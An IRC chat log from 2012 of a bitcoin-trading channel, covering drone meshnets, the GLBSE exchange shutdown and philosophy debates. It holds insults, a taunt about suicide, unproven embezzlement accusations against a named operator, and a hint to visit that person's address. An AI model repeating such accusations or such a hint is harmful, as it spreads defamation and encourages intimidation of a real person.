07:36:59 solar-powered. Oct 06 07:37:00 Rule everything from there Oct 06 07:37:09 The world even! Oct 06 07:37:10 derigables Oct 06 07:37:22 you can program them to pass off the server to an freshly charged one and return to a recharging station Oct 06 07:37:57 meshnet darknet Oct 06 07:38:01 All you need is the data link to the surface. Oct 06 07:38:15 wifi B0g4r7 wifi Oct 06 07:38:24 I suppose you could use 802.11esque gear. Oct 06 07:38:36 If they hung out low enough. Oct 06 07:38:50 You could also simply buy out an island nation... Oct 06 07:39:00 I guess the atmosphere doesn't really extend but a few miles up, no? Oct 06 07:39:00 So everything BTC becomes legal... Oct 06 07:39:04 Shouldn't be a problem. Oct 06 07:39:12 and operate from there... just costy. Oct 06 07:39:24 Islands can be assaulted. Oct 06 07:39:26 let's get elon musk to buy bitcoin a sat-net Oct 06 07:39:38 Big honkin SPOF. Oct 06 07:40:07 bitcoin, first currency of the last frontier Oct 06 07:40:16 A distributd redundant skynet is much more resiliant. Oct 06 07:40:25 nicew Oct 06 07:41:58 i'm going to make one of those arduino quadcopter drones and program it to find water, find a good spot, drop in a line, hook a fish, and brink it back to me Oct 06 07:42:03 ultimate fishing Oct 06 07:42:13 I routinely deploy wife-esque PtP and PtMP radio links up to 20 miles using not-so-expensive gear. Seems workable tecchnically if the whole flight thing works out Oct 06 07:42:35 And coverage is dense enough. Oct 06 07:42:58 "I need to wait for one to fly over to send this transaction" lol. Oct 06 07:43:17 I want a darknet where network nodes are automatically compensated in BTC for legit traffic Oct 06 07:43:36 BitFS. Oct 06 07:44:02 [MPEX] [S.MPOE] 31300 @ 0.00037506 = 11.7394 BTC [-] Oct 06 07:44:16 A distributed FS, based on bittorrent-style p2p, incorporating BTC. Oct 06 07:44:23 it's what the internet should be, by the people, for the people Oct 06 07:44:25 Run a node, host content, get paid BTC. Oct 06 07:44:33 basically one big circle jerk Oct 06 07:45:10 Wanna be sure your content's replicated and available? Pay a few Satoshis. Oct 06 07:45:15 And I'd want efficient governments who don't have to forbid activities simply because protecting people and separating harmful activities from non-harmful ones would be too hard if said activities were not forbidden. Oct 06 07:45:26 I doubt governments could be as efficient however. Oct 06 07:45:33 well, B0g4r7 i think there would still be hosting companies Oct 06 07:45:47 If they'd at least get all their paperwork informatized... Oct 06 07:45:47 nodes are just trafickers Oct 06 07:45:54 Sure, companies could do it just as individuals could. Oct 06 07:46:08 But no, the idea is to be fully decentralized. Oct 06 07:46:34 Anyone can host, anyone can publish. Oct 06 07:47:00 Pay some BTC, and your publication gets replicated by those who collect that same BTC. Oct 06 07:47:29 BTC-Mining: dream on Oct 06 07:47:32 Need some BTC? Put some storage and bandwidth to work running a node and collect some. Oct 06 07:48:14 Hey... if we could at least get things done centrally... like changing our address for all government bodies at the same place... Oct 06 07:48:17 B0g4r7: think nanobtc tho, with a system like what we're talking about, the cost of bandwith drops to near zero Oct 06 07:48:38 Have some online portal to manage our citizen-government relation... Oct 06 07:48:39 well, yeah, BTC was a generalization. Oct 06 07:48:50 Divide as needed. Oct 06 07:48:52 Things would get much more efficient... Oct 06 07:49:02 mm hmm. Oct 06 07:49:05 ;;ticker Oct 06 07:49:06 Best bid: 12.674, Best ask: 12.7, Bid-ask spread: 0.02600, Last trade: 12.674, 24 hour volume: 27944, 24 hour low: 12.51, 24 hour high: 12.89999 Oct 06 07:49:08 Silly governments still mostly paperwork... Oct 06 07:49:11 Seriously... Oct 06 07:49:23 Then individuals could vote on individual issues instead of relying on elected reps to do this for them. Oct 06 07:49:29 Uh oh, that's dangerous talk. Oct 06 07:49:40 Very inefficient medium to store information. Oct 06 07:49:44 terrorist! Oct 06 07:49:57 oh my, you ever get a good wiff of balls and it smelled good? Oct 06 07:50:07 squirrel! Oct 06 07:50:12 lol Oct 06 07:50:19 tennis balls ? Oct 06 07:50:22 <____Atlas_____> BTC-Mining: Asian countries have had such systems for awhile Oct 06 07:50:28 I'd agree with B0g4r7... it could also, theorically, be possible for the whole population to vote an all issues... Oct 06 07:50:48 [MPEX] [S.DICE] 350 @ 0.00339994 = 1.19 BTC [+] Oct 06 07:50:50 Yeah, if they cared enough to login and do it. Oct 06 07:51:04 If they didn't, oh well, they didn;t weigh in, but they will have had their chance. Oct 06 07:51:36 Atlas... I would vertainly love too... Oct 06 07:51:44 they'll probably will, eventually... Oct 06 07:52:42 Atlas, what systems are you referring to? Oct 06 07:52:53 The one described above? Oct 06 07:52:59 <____Atlas_____> Not exactly Oct 06 07:53:06 <____Atlas_____> I just know their ID systems are GPG based Oct 06 07:53:11 oh Oct 06 07:53:38 <____Atlas_____> It's like how law and ID systems should be in the 21st century Oct 06 07:53:41 anyone here want to/can do an mtgoxusd->ing p2p, i see an arb op Oct 06 07:53:50 mircea_popescu: are you still here? Oct 06 07:54:07 yes. Oct 06 07:54:47 <____Atlas_____> I keep having these dreams of being on elevators that go side-to-side, up and down in these large futuristic office complexes Oct 06 07:54:57 <____Atlas_____> Then people get on and we talk in this weird foreign language Oct 06 07:55:21 nice dream Oct 06 07:55:21 <____Atlas_____> Then I get off and follow a woman and she gives me her phone number Oct 06 07:55:34 <____Atlas_____> I try to read it but by the time I can, I wake up Oct 06 07:55:49 <____Atlas_____> One of these days I am going to decipher, remember it and call it Oct 06 07:56:12 The number is 111119. Oct 06 07:56:26 I remember it from my own dream about 12 years back. Oct 06 07:56:34 <____Atlas_____> lol Oct 06 07:57:03 And hear the most soul chilling voice of pure evilness answers, telling you truths that would have preferred to never hear about? Oct 06 07:57:34 So you can then ponder why you called. Oct 06 07:57:36 <____Atlas_____> "Glenn Beck raped and murdered a little girl in 1999." Oct 06 07:57:55 big surprise Oct 06 07:58:07 <____Atlas_____> Honestly, I wouldn't mind that. I already hear ghosts whisper in my ear at night. I am already going batshit insane. Oct 06 07:58:19 Yeah... I think there's more scary than that... Oct 06 07:58:34 "in a world gone mad, sanity's no real sign of health" Oct 06 07:59:08 <____Atlas_____> I am pretty confident my sanity is in tact though. These probably are real entities trying to contact me. Oct 06 07:59:26 <____Atlas_____> Anecdotal evidence shows it happens to a lot of people. Oct 06 07:59:31 Ever watch the first Final Fantasy movie, The Spirits Within? Oct 06 07:59:39 <____Atlas_____> Nope. Oct 06 07:59:51 It had that kind of a thing, communication in a dream. Oct 06 07:59:55 recurring dream Oct 06 08:00:16 ghosts? Wouldn't it be schizophrenia? Common symptom is auditory hallucinations. Oct 06 08:00:35 I saw a doc on Tesla, and it said that's where a lot of his ideas came from. Oct 06 08:00:36 <____Atlas_____> BTC-Mining: Meh, there are usually more symptoms than this. Oct 06 08:00:47 <____Atlas_____> I do have a blood abnormality. Oct 06 08:00:55 <____Atlas_____> That may a thing or two to do with it. Oct 06 08:00:58 <____Atlas_____> have* Oct 06 08:01:00 He's get a "flash from beyond", and knew that he had to bring it into being in the physical world. Oct 06 08:01:13 boom, fantastic invention(s). Oct 06 08:01:16 Eh, there's all sorts of levels of symptoms for such things. Sometimes you only get a few if it's mild. Oct 06 08:01:51 http://en.wikipedia.org/wiki/Savant_syndrome Oct 06 08:02:20 damn, I just spent 5 min. logging into liberty reserve, only to find that I left nothing there Oct 06 08:02:37 <____Atlas_____> B0g4r7: Several hypnotherapists will confirm that's how most innovation happens. Oct 06 08:02:42 All in BTC now Oct 06 08:03:34 <____Atlas_____> Apparently Earth and humanity is one of the lowest forms of sentient life in the universe. Oct 06 08:03:48 Seemingly there are things above. Oct 06 08:03:57 <____Atlas_____> Apparently this is the very definition of hell. Oct 06 08:04:03 I suppose it would be naive to assume that there are not. Oct 06 08:05:11 ;;ticker Oct 06 08:05:12 Best bid: 12.674, Best ask: 12.71001, Bid-ask spread: 0.03601, Last trade: 12.71001, 24 hour volume: 28057, 24 hour low: 12.51, 24 hour high: 12.89999 Oct 06 08:05:15 ;;bc,24hprc Oct 06 08:05:16 12.67 Oct 06 08:06:46 <____Atlas_____> The wikipedia 3 revert rule is stupid. Oct 06 08:06:53 <____Atlas_____> Somebody puts utter bullshit on a page Oct 06 08:06:58 <____Atlas_____> you revert it 3 times Oct 06 08:07:02 <____Atlas_____> do it more and you get blocked Oct 06 08:07:14 <____Atlas_____> Meanwhile, the complete dumbass continues to ruin the page Oct 06 08:07:40 What Would Jimmy Wales Do? Oct 06 08:07:55 <____Atlas_____> Knowing what I know about him now... Oct 06 08:08:07 <____Atlas_____> Probably spew some dribble about values, integrity and consensus. Oct 06 08:08:43 <____Atlas_____> And how even the lowest form of life deserves wasted effort when it comes to crap on a wikipedia page. Oct 06 08:09:08 <____Atlas_____> Then he wonders why most articles don't have "good status" Oct 06 08:09:19 [01:03] <____Atlas_____> Apparently Earth and humanity is one of the lowest forms of sentient life in the universe. Oct 06 08:09:19 [01:03] <____Atlas_____> Apparently this is the very definition of hell. **** BEGIN LOGGING AT Sat Oct 6 09:00:09 2012 Oct 06 09:00:36 Yeah, right. China is more free than UK? I guess, if you're willing to risk the wrath of the oligarchs. Oct 06 09:00:45 Maybe disappear one day. Oct 06 09:00:52 lol: https://bitcointalk.org/index.php?topic=77301.msg859378#msg859378 Oct 06 09:00:52 <____Atlas_____> midnightmagic: That's only if you bother the politicians Oct 06 09:00:55 Stay at a nice unmarked hotel for a while.. Oct 06 09:00:59 <____Atlas_____> If you keep to your own business Oct 06 09:01:03 <____Atlas_____> They leave you alone Oct 06 09:01:06 That's not true. Oct 06 09:01:12 ____Atlas_____ that means "if you don't make any money" Oct 06 09:01:30 <____Atlas_____> Okay, well, you'll eventually need triad protection Oct 06 09:01:30 smickles how'd that go ? Oct 06 09:01:35 <____Atlas_____> but you have choice in government Oct 06 09:01:43 <____Atlas_____> The triads are numerous Oct 06 09:01:48 dude gtfo. Oct 06 09:02:00 this consumer culture. you think you chose ? why'd you choose. you're the cow. Oct 06 09:02:01 they choose. Oct 06 09:02:17 mircea_popescu: well, that day was my brother and sister's birthday. we had a party Oct 06 09:02:28 nice. Oct 06 09:02:31 <____Atlas_____> If you are capable of making money, you have value. You just have to use it to your advantage. Oct 06 09:02:38 <____Atlas_____> You can buy power. Oct 06 09:02:49 Triads? Oct 06 09:02:53 "have value" means you're a cow. Oct 06 09:02:55 <____Atlas_____> Chinese mobs Oct 06 09:03:04 That's an amazing ass you have, it sounds almost it can talk.. Oct 06 09:03:11 sure Oct 06 09:03:34 <____Atlas_____> I know nothing except that power can be acquired. Oct 06 09:03:43 <____Atlas_____> We are not all weak and powerless against the world Oct 06 09:04:01 sure it can. but it can't be aquired by just about anybody. Oct 06 09:04:06 you have to be a certain sort. Oct 06 09:04:37 Mobs tend to have trouble operating in a totalitarian regime where both the government and the people hate them in equal measure, and the death penalty takes basically one annoyed judge somewhere to point his finger and make half a town disappear. Oct 06 09:05:20 midnightmagic not really true. the russians never got anywhere against their vor. Oct 06 09:06:02 <____Atlas_____> The mobs tend to control the government... Oct 06 09:06:07 It's true for China.. Oct 06 09:06:13 <____Atlas_____> They pay the politicians handsomely. Oct 06 09:06:21 lol Oct 06 09:06:27 midnightmagic i dunno much about china Oct 06 09:06:37 <____Atlas_____> This is at least true for Russia Oct 06 09:07:01 corruption is rampant in china Oct 06 09:07:03 <____Atlas_____> The world is absolutely rudderless. No authority is sacred. Oct 06 09:07:26 Corruption is indeed rampant in China. But the government doesn't like competition.. Oct 06 09:08:07 <____Atlas_____> Neither does the mobs. Oct 06 09:08:12 <____Atlas_____> The government isn't special Oct 06 09:08:19 now that much is true Oct 06 09:08:24 govt = just one of the mobs. Oct 06 09:08:39 yeaah.. Just because something pops into your head and you can't think of anything else, that doesn't make it true, Atlas. Oct 06 09:08:59 wonder how much bitcoin has to be before we can pay off politicians i some country Oct 06 09:09:03 <____Atlas_____> lol you can't negate that Oct 06 09:09:09 blah blah blah Oct 06 09:09:09 <____Atlas_____> statement of mine Oct 06 09:09:13 hi btw Oct 06 09:09:25 <____Atlas_____> You Oct 06 09:09:31 <____Atlas_____> You are just scared. Oct 06 09:09:43 shitbag are you talking to me Oct 06 09:09:49 or the room Oct 06 09:09:56 <____Atlas_____> So what if I am? Oct 06 09:10:01 <____Atlas_____> You scared, jcpham? Oct 06 09:10:05 At this point, since you are the one talking about needing triad protection, it's time for you to give up some evidence. Pretend I said nothing, assume I withdraw all my comments. You make an assertion. Now back it up. Oct 06 09:10:08 sure Oct 06 09:10:11 come get me Oct 06 09:10:48 <____Atlas_____> midnightmagic: I am here to have a discussion and a mixture of ideas. Oct 06 09:10:59 lies Oct 06 09:11:03 <____Atlas_____> I am not out to prove mine but rather consider all possibilities. Oct 06 09:11:07 jcpham: You're not helping.. Oct 06 09:11:15 i never do Oct 06 09:11:19 anyways i'm off Oct 06 09:11:31 ____Atlas_____: In that case, I'm going to call shedanigans, and point and laugh. Oct 06 09:11:50 <____Atlas_____> Okay, government is the supreme authority. Oct 06 09:11:54 <____Atlas_____> Nothing else can compete. Oct 06 09:12:02 <____Atlas_____> Because that's just how things are. Oct 06 09:12:11 singularity events can compete Oct 06 09:12:13 <____Atlas_____> Guns are only relevant in the hands of governments. Oct 06 09:12:19 <____Atlas_____> Other people? Oct 06 09:12:22 <____Atlas_____> It doesn't matter. Oct 06 09:12:26 <____Atlas_____> Governments always win. Oct 06 09:12:44 Oh good grief, I started him off on one of his weird diatribes. Oct 06 09:12:48 Sorry, channel. Oct 06 09:14:00 <____Atlas_____> You see, this person is not interested in a discussion rather a social battle of sorts. Oct 06 09:14:15 <____Atlas_____> Very ungentleman-like Oct 06 09:14:26 <____Atlas_____> Would not drink with Oct 06 09:15:10 ____Atlas_____ remind me what has this to do with btc assets Oct 06 09:16:02 <____Atlas_____> I serve an important role in filling idle space Oct 06 09:16:15 <____Atlas_____> that would otherwise would be pure energy-wasting whiteness Oct 06 09:16:23 <____Atlas_____> by filling the space with dark text Oct 06 09:16:27 <____Atlas_____> energy is saved Oct 06 09:17:50 maybe my screen is black ? Oct 06 09:17:54 <____Atlas_____> Mmmm Oct 06 09:18:06 <____Atlas_____> then I am subsidizing energy companies in your case Oct 06 09:18:10 <____Atlas_____> Ying and Yang Oct 06 09:19:21 <____Atlas_____> http://i.imgur.com/pzpui.jpg Oct 06 09:19:23 <____Atlas_____> Oh my Oct 06 09:21:03 [MPEX] [S.MPOE] 14300 @ 0.0003727 = 5.3296 BTC [-] Oct 06 09:22:14 Hey Atlas, you sent on LitecoinTalk that you were leaving the BTC forum, then someone named "Atlas" joined the forum. Was that you? Oct 06 09:22:18 *said Oct 06 09:23:21 <____Atlas_____> Gladamas: I left under the condition I remained banned Oct 06 09:23:26 <____Atlas_____> Theymos unbanned me Oct 06 09:23:49 ah, well nice to see you back :) you really do have some good viewpoints. Oct 06 09:24:16 <____Atlas_____> Well, thank you. Oct 06 09:24:23 <____Atlas_____> That means a lot, genuinely so. Oct 06 09:24:51 I think some of the people mad at you are just jealous at your logic Oct 06 09:25:03 You're very welcome, I mean it Oct 06 09:25:13 *jealous of Oct 06 09:26:01 <____Atlas_____> Heh. That might be a possibility. Oct 06 09:26:08 <____Atlas_____> I am sure there are other reasons though. Oct 06 09:28:14 <____Atlas_____> As for assets related discussion Oct 06 09:28:16 <____Atlas_____> https://bitcointalk.org/index.php?topic=115669.msg1249458#msg1249458 Oct 06 09:29:03 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.75236384 = 752.3638 BTC [+] Oct 06 09:29:10 [MPEX] [O.BTCUSD.P190T] 880 @ 0.66257291 = 583.0642 BTC [-] Oct 06 09:30:38 [MPEX] [O.BTCUSD.P130T] 170 @ 0.19728394 = 33.5383 BTC [+] Oct 06 09:30:39 [MPEX] [O.BTCUSD.P120T] 85 @ 0.14383845 = 12.2263 BTC [+] Oct 06 09:30:41 [MPEX] [O.BTCUSD.P140T] 220 @ 0.25780139 = 56.7163 BTC [+] Oct 06 09:31:47 <____Atlas_____> lol CornedBeefHash is not a sock Oct 06 09:59:04 [MPEX] [S.MPOE] 33400 @ 0.0003727 = 12.4482 BTC [-] Oct 06 09:59:05 [MPEX] [S.MPOE] 20700 @ 0.00037153 = 7.6907 BTC [-] Oct 06 10:12:10 https://bitcointalk.org/index.php?topic=115669.msg1249531#msg1249531 somebody quote this lol Oct 06 10:14:38 "I assume he's spending user deposits. Maybe he's using his own money, but I don't think he has enough to cover lawyer fees. He said in the meeting that he wants BitcoinGlobal to pay for the lawyer." Oct 06 10:14:49 Wow... nice theymos, nice... Oct 06 10:15:28 He just "assumed" it Oct 06 10:15:31 needs to be preserved for posteriority. Oct 06 10:16:14 That's exactly the kind of things I was talking about when people state their opinion/speculation as facts... Oct 06 10:16:18 Seriously... Oct 06 10:17:14 <____Atlas_____> Theymos wouldn't say that without a good hunch Oct 06 10:17:21 <____Atlas_____> He knows how much GLBSE has in total Oct 06 10:17:24 seems rather convincing to me too. Oct 06 10:19:44 Yeah, but he doesn't know. Oct 06 10:19:53 <____Atlas_____> Well, we don't know if the moon is hollow. Oct 06 10:19:59 <____Atlas_____> Sometimes an assumption is reasonable. Oct 06 10:20:00 "His name is Nefario. How could you people not see this coming?" this is so retarded. Oct 06 10:20:05 <____Atlas_____> lol Oct 06 10:20:10 You don't start executing someone for murder, than investigate if he was the murdered. Oct 06 10:20:15 what's this, a coloring book ? Oct 06 10:20:41 <____Atlas_____> BTC-Mining: Well Nefario is disobeying GLBSE's bylaws Oct 06 10:20:51 <____Atlas_____> He is technically already violating policy left and right Oct 06 10:21:43 Yes, but he hasn't stolen anything... the first claim by theymos was stating it as a fact, when he was just speculating. Oct 06 10:22:05 He hasn't been proven to have stolen anything* Oct 06 10:22:34 It should have been stated as such that it was an opinion/guess and why Oct 06 10:22:41 Not put it forward as a fact. Oct 06 10:22:53 <____Atlas_____> Here are the facts: Oct 06 10:22:54 An opinion is not a fact. Oct 06 10:23:07 <____Atlas_____> 1. GLBSE has had very little revenue Oct 06 10:23:11 <____Atlas_____> very little profit Oct 06 10:23:13 <____Atlas_____> if any Oct 06 10:23:25 <____Atlas_____> 2. Assuming the funds available are just user funds Oct 06 10:23:27 BTC-Mining things presented as fact but w/o acompanying documentation should be read as opinions. Oct 06 10:23:37 <____Atlas_____> and he wants to spend some of them for lawyer fees Oct 06 10:23:46 something's not a fact by virtue of carrying a "fact" tag given by the author. Oct 06 10:23:49 <____Atlas_____> then it is reasonable to think he is embezzling funds Oct 06 10:24:23 No... in my book you write them as "I think/believe/would guess that X because Y" Oct 06 10:24:44 you can write it any way you please, but unless it's "here's so and so and here's the proof" it ain't a fact. Oct 06 10:24:46 Not simply state X. It confuses people as having been witnessed by the claimer. Oct 06 10:24:56 i guess it's a difference of approach. Oct 06 10:25:04 [MPEX] [S.MPOE] 6700 @ 0.00037432 = 2.5079 BTC [+] Oct 06 10:25:05 [MPEX] [S.MPOE] 5900 @ 0.00037546 = 2.2152 BTC [+] Oct 06 10:25:42 Well the thing is, by formulating it as a fact, one could believe theymos actually saw that funds were being moved away from the reserve. Oct 06 10:26:33 maybe he did. Oct 06 10:26:33 There's a reason the english language has words such as "could, might, guess, believe, think, etc." Oct 06 10:26:56 He later said "I assume he's spending user deposits. Maybe he's using his own money, but I don't think he has enough to cover lawyer fees. He said in the meeting that he wants BitcoinGlobal to pay for the lawyer." Oct 06 10:27:02 <____Atlas_____> I am just finding it hard to be empathic towards someone who closed down a mutually owned company without clear consent Oct 06 10:27:13 you're comitting the exact converse of the error you protest it seems. theymos saw something, did he ? Oct 06 10:27:26 Acknowledging he might be using his own money, and that he just claimed he stole fund because he didn't think Nefario had the money for a lawyer. Oct 06 10:27:44 now look. if i go into a house with a girl and come out with a body Oct 06 10:27:49 have you witnessed a murder or not ? Oct 06 10:27:57 Nope. Oct 06 10:28:06 well that's the problem. you haven't, but in your place i have. Oct 06 10:28:36 and i doubt we'll ever agree on this point Oct 06 10:29:13 Okay... so assuming you didn't see what you think you saw and there was no body, you'd go around claiming a murder? Oct 06 10:29:24 well what did i see ? Oct 06 10:29:40 <____Atlas_____> It depends how large the building was Oct 06 10:29:46 I'd probably report it stating I saw someone carrying what seemed like a body out of a house. Oct 06 10:29:51 ____Atlas_____ 100 sqft Oct 06 10:29:56 I wouldn't go stating I saw a murder. Oct 06 10:29:57 <____Atlas_____> Yep, murder Oct 06 10:30:04 <____Atlas_____> if the building is 100 sqft Oct 06 10:30:08 well BTC-Mining you're in a very studied minority. Oct 06 10:30:15 and i don't think you're particularly right, either. Oct 06 10:30:20 <____Atlas_____> If it's a large complex Oct 06 10:30:23 <____Atlas_____> I would have doubt Oct 06 10:30:52 I state what I see for what it is. If I'm just speculating, I'd present it as such. Oct 06 10:30:56 in any case and whatever happend, nef should've known there's lots of negative gossip in the community if there are no clear statements from him, lol Oct 06 10:31:18 BTC-Mining when you look at your computer do you see something that seems like a screen Oct 06 10:31:21 or an actual screen ? Oct 06 10:31:45 I would say I see an actual screen. Oct 06 10:31:53 right. because why ? Oct 06 10:31:55 maybe you're wrong. Oct 06 10:31:59 maybe it's something else. Oct 06 10:32:09 Because I can see it up close and I know it to be a screen. Oct 06 10:32:13 how close ? Oct 06 10:32:51 Eh... you'd want a distance at which I'd claim or not claim to have seen something? Oct 06 10:32:57 fact of the matter is, knowledge is always assailable from a purely nominalist perspective. Oct 06 10:33:03 how you draw the lines is arbitrary Oct 06 10:33:17 gotta learn to live with people's many lines. Oct 06 10:33:59 <____Atlas_____> I try to look at the relevance of right and wrong in this case Oct 06 10:34:04 <____Atlas_____> and to me any libel in this case Oct 06 10:34:05 Yes. But that you decide to claim what you saw or not as a body, you still can't say you witnessed a murder. Oct 06 10:34:07 <____Atlas_____> is easily undone Oct 06 10:34:19 <____Atlas_____> So, really, the whole argument is non notable Oct 06 10:34:22 BTC-Mining for the same reason you decide you saw a screen i decide i saw a murder. Oct 06 10:34:31 i judged myself close enough. Oct 06 10:34:47 Eh, I suppose. Oct 06 10:34:59 but atlas has it, it's not really a notable argument. Oct 06 10:35:15 You could reasonably assume a murder was committed. Oct 06 10:35:41 the reason natural languages are natural is that you always have to begin communication by negotiating terms. Oct 06 10:36:00 there's never going to be a workable version were we instantly understand what the other means just by reading the words Oct 06 10:36:16 But you saw a body being carried out. As such you cannot claim that you saw the person carrying said body murdered someone. You can only guess or propose said person as the probable murderer. Oct 06 10:36:34 i never claimed i saw the guy murder someone. i just claimed i saw a murder. Oct 06 10:36:45 You can state the first as a fact, and the second as a proposition Oct 06 10:37:02 Okay. So in your example it's fine then. Oct 06 10:37:16 yes, but it only becomes fine after you overcome your initial interpretation of what i said Oct 06 10:37:19 But theymos, on the other hand, apparently didn't saw anything. Oct 06 10:37:23 which will always be the case no matter who or what. Oct 06 10:37:40 <____Atlas_____> I like how we have deep philosophical discussions Oct 06 10:37:50 <____Atlas_____> This Socrates grade stuff here Oct 06 10:37:54 <____Atlas_____> This is* Oct 06 10:38:03 But theymos still stated like it was set in stone "He is also illegally using user deposits to pay for his lawyer." Oct 06 10:38:15 Without even seeing anything. Oct 06 10:38:20 well theymos is also an idiot. i was just using this as a convenient example. Oct 06 10:38:26 i'm not defending theymos wtf. Oct 06 10:39:13 Well the whole argument was about how how presenting an opinion/guess as a fact is bad if you didn't directly witness the fact, as it creates confusion for the listener. Oct 06 10:39:48 yeah. moreover, about how there's little choice in the matter : you're always going to create confusion. it's part of communication. Oct 06 10:39:51 or at least that's what I was stating until you interupted me to say that anything presented as a fact is an opinion. Oct 06 10:40:20 Yes, always going to be some confusion. Oct 06 10:40:50 <____Atlas_____> A fact is merely a unified vision of an arbitrary number of individuals. Oct 06 10:40:51 which is why we don't take forum shit *that* seriously. to keep our sanity. Oct 06 10:40:57 especially if no coroboration or proof is offered. Oct 06 10:41:00 I'm simply stating I'm quite astonished at the sheer amount of hearsay/opinion/etc. presented as facts instead of for what it is... Oct 06 10:41:01 <____Atlas_____> Perception is reality Oct 06 10:41:04 <____Atlas_____> Reality is facts Oct 06 10:41:27 <____Atlas_____> If a civilization agrees 2 + 2 = 5 Oct 06 10:41:30 <____Atlas_____> It might as well be Oct 06 10:41:38 When I'm talking to people in person, I'm used to people being much clearer and honest about what is their opinion and what they claim as facts. Oct 06 10:41:54 BTC-Mining you probably spend a lot of time in an academic environment. Oct 06 10:42:12 <____Atlas_____> Heh. Oct 06 10:42:13 I'm spending time with Canadians. Oct 06 10:42:17 haha ok Oct 06 10:42:20 Wittgenstein thought that most of what people say to one another is never fully understood. Oct 06 10:42:32 midnightmagic did he say this ? or just think it ? Oct 06 10:42:43 <____Atlas_____> That is likely true, midnightmagic. Oct 06 10:42:44 I suppose according to stereotypes, that makes perfect sense... Oct 06 10:43:12 <____Atlas_____> As a absurdist-nihilist, it's hard for me to get into these kinds of arguments. Oct 06 10:43:23 mircea_popescu: Every conversation he had was apparently full of, "But what do you MEAN?" At least according to this book I read called "Wittgenstein's Poker" Oct 06 10:43:39 yeah Oct 06 10:44:55 Wovon man nicht sprechen kann, darüber muss man schweigen. Oct 06 10:45:27 .tr :en :de of the crooked reeses of women no straight cock was ever made Oct 06 10:45:27 mircea_popescu: "der schiefe reeses der Frauen nicht gerade Schwanz war jemals gemacht" (en to de, translate.google.com) Oct 06 10:45:41 sounds legit. Oct 06 10:45:52 <____Atlas_____> Whereof one cannot speak, thereof one must be silent. Oct 06 10:45:58 <____Atlas_____> Sounds pretty dogmatic to me Oct 06 10:46:36 you’d say that Oct 06 10:46:56 <____Atlas_____> What a religious man. Oct 06 10:47:54 <____Atlas_____> I teach you the overman. Man is something that shall be overcome. What have you done to overcome him? Oct 06 10:48:13 <____Atlas_____> All beings so far have created something beyond themselves; and do you want to be the ebb of this great flood and even go back to the beasts rather than overcome man? What is the ape to man? A laughingstock or a painful embarrassment. And man shall be just that for the overman: a laughingstock or a painful embarrassment... Oct 06 10:48:52 god just shut up you shallow, twee, fool Oct 06 10:49:11 <____Atlas_____> You need a god it seems, reeses. Oct 06 10:49:21 <____Atlas_____> You need structure, your very soul depends on it. Oct 06 10:49:32 if I had a soul, it would thank you Oct 06 10:49:34 <____Atlas_____> Else you become scared, threatened. Oct 06 10:50:24 ____Atlas_____: I hear you like to try to kill your failure by killing your body Oct 06 10:51:20 <____Atlas_____> The thought of the option of death can be empowering. Oct 06 10:51:36 it’s not an option if you refuse to take it Oct 06 10:52:09 What are you rambling about Atlas? Oct 06 10:52:14 then it’s just a chomskyan pseudo-option Oct 06 10:52:32 <____Atlas_____> lol Oct 06 10:53:38 <____Atlas_____> So choice is an illusion to you? Oct 06 10:54:04 [MPEX] [S.MPOE] 37400 @ 0.00037153 = 13.8952 BTC [-] Oct 06 10:54:06 [MPEX] [S.MPOE] 20900 @ 0.0003711 = 7.756 BTC [-] Oct 06 10:54:09 <____Atlas_____> There are many options that we do not exercise immediately. Oct 06 10:54:20 <____Atlas_____> but how does that not make them available options? Oct 06 10:54:28 <____Atlas_____> What other worldly limitation is there? Oct 06 10:54:41 <____Atlas_____> Our own authenticity to live by our chosen method? Oct 06 10:54:49 <____Atlas_____> If that is the case, I happily accept that limitation. Oct 06 10:54:59 <____Atlas_____> Without a tear of remorse. Oct 06 10:55:41 <____Atlas_____> BTC-Mining: It seems unclear. Oct 06 10:56:46 Well, if you're deterministic and believe every choice you make were guaranteed by the current state and movement of matter and energy in the universe... You could say no one actually make decision, what they do is simply what every atom in they body would make them do. Oct 06 10:57:17 Then came quantum mechanics... Oct 06 10:58:35 <____Atlas_____> What if we are the universe? Oct 06 10:59:37 eh, I'm not sure how that would work... Oct 06 10:59:49 I can only think about this: http://www.boreme.com/posting.php?id=12282#.UG_kxVH4V8E Oct 06 10:59:53 <____Atlas_____> There is the theory of spiritualism. Oct 06 11:00:42 Eh, well I'm not very concerned about if there's anything after death and if that would possibly interact directly with the observable universe. Oct 06 11:01:24 <____Atlas_____> Assuming there is an origin of this universe, of whatever means, it could be deducted we are of that origin, we are or were a part of that origin. Oct 06 11:01:35 <____Atlas_____> If there is no clear origin Oct 06 11:01:37 <____Atlas_____> Then fuck Oct 06 11:01:51 <____Atlas_____> I mean, the universe could be utter chaos Oct 06 11:02:03 <____Atlas_____> but that's not clear as my body and perception remain stable Oct 06 11:02:10 <____Atlas_____> There are some anomalies... Oct 06 11:02:19 <____Atlas_____> but otherwise, things remain somewhat consistent. Oct 06 11:02:36 Yes... we might just as well be bored entities among nothingness who needed something to do, so we created a universe as a playground in which we would not remember having ever lived outside of it. Oct 06 11:02:48 or any other scenario you can imagine Oct 06 11:04:49 It's not something we can answer in any case. Kind of hard to be concerned about it when it could be anything or nothing. Oct 06 11:05:36 You could ponder about it endlessly making as many scenarios you want, but never even come close to the reality of things. Oct 06 11:05:55 <____Atlas_____> Well it's fun at times. Oct 06 11:06:15 and in the end, you have lost the only thing you were sure of, which is your current existence as a human. Oct 06 11:06:28 Yes, at times, among other things. Oct 06 11:06:54 Having fun is part of being human and imagination can be amusing. Oct 06 11:07:32 nefario, FUCK YOU ! Oct 06 11:07:38 <____Atlas_____> He's not here. Oct 06 11:07:44 <____Atlas_____> We have his address though. Oct 06 11:07:48 <____Atlas_____> You can give him a visit. Oct 06 11:08:24 What's the problem femtotube, other than GLBSE is closing down? Oct 06 11:09:39 BTC-Mining: ??? are you a fkn retard? I had portfolio in GLBSE and now it's all gone. Zero Oct 06 11:10:27 <____Atlas_____> lol Oct 06 11:10:32 Well as long as we get asset holders list, all assets are still perfectly valid even if not on an exchange. Oct 06 11:10:40 <____Atlas_____> Yes but femtotube has a point Oct 06 11:10:47 <____Atlas_____> the value is reduced considerably Oct 06 11:10:54 It would be harder to trade, yes. Oct 06 11:10:54 <____Atlas_____> regardless if they can still be claimed Oct 06 11:11:05 We'd have to trade them OTC style. Oct 06 11:13:46 <____Atlas_____> I've always wondered... Oct 06 11:13:54 <____Atlas_____> I hit a bus while riding my bike Oct 06 11:14:05 <____Atlas_____> I did not immediately fall down Oct 06 11:14:05 It would be a bit harder, but I don't see why it couldn't be 